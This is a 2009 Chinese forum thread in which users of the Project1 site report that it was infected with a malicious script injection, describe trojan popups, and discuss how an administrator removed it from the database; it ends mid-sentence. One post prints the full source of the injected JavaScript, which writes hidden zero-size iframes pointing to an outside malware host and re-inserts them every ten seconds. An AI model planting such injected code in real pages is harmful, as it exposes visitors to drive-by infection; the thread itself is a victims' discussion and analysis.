Project1

标题: 被挂马了 = = [打印本页]
作者: 雪流星    时间: 2009-6-11 10:42
标题: 被挂马了 = =


作者: 杨飞云    时间: 2009-6-11 12:25
提示: 作者被禁止或删除 内容自动屏蔽
作者: 木葬枫    时间: 2009-6-11 15:01
多个版块连接含有此代码.
作者: zh99998    时间: 2009-6-11 15:33
为什么搜最近两天修改过的文件除了监狱数据库就是附件……{/gg}逛逛mssql……
作者: 懒散王    时间: 2009-6-11 15:47
我这里是无限制弹出木马拦截窗口,

并同时出现“已超出可以在浏览中同时打开的pdf文档的最大数量”窗口 = =

(丫的这弹出窗口弄得我字打不完 囧rz)

附上瑞星给的木马详细信息http://hold.rising.com.cn/urlhol ... amp;rb=lYumDqG1a1I=
作者: 越前リョーマ    时间: 2009-6-11 15:48
木马连续跳出至少6个……
作者: chaochao    时间: 2009-6-11 15:55
ht tp://3b3.org/c.js
这个.怎么搞的?
作者: chaochao    时间: 2009-6-11 16:02
那个玩意儿的源代码:
  1. var s,siteUrl,tmpdomain;
  2. var arydomain = new Array(".gov.cn",".edu.cn");
  3. s = document.location+"";
  4. siteUrl=s.substring(7,s.indexOf('/',7));
  5. tmpdomain = 0;
  6. for(var i=0;i<arydomain.length; i++)
  7. {
  8. if(siteUrl.indexOf(arydomain[i]) > -1){
  9. tmpdomain = 1;
  10. break;
  11. }
  12. }
  13. if(tmpdomain == 0){
  14. document.writeln("<iframe src=http://ccndk822.cn/a/a100.htm width=0 height=0></iframe>");
  15. function rl()
  16. {
  17. var msgObj = document.createElement("div");
  18. msgObj.setAttribute("id","msgDiv");
  19. document.body.appendChild(msgObj);
  20. var obj = document.getElementById("msgDiv");
  21. obj.innerHTML ="<iframe src=http://ccndk822.cn/a/a100.htm width=0 height=0></iframe>";
  22. }
  23. setInterval("rl()",10000);
  24. }
  25. document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.linezing.com\/1136402\/tongji.js\"><\/script>");
复制代码
仅供研究,不良后果自负.
作者: zh99998    时间: 2009-6-11 16:21
清理完毕
作者: 越前リョーマ    时间: 2009-6-11 16:48
以下引用zh99998于2009-6-11 8:21:09的发言:

清理完毕

你清理的?
怎么清理的?{/gg}
作者: zh99998    时间: 2009-6-11 16:48
进mssql就清理了啊
作者: 越前リョーマ    时间: 2009-6-11 16:49
以下引用zh99998于2009-6-11 8:48:24的发言:

进mssql就清理了啊

算了,当我没问…… - -(依旧没明白)
作者: zh99998    时间: 2009-6-11 16:57
好吧,就是进数据库手动把那些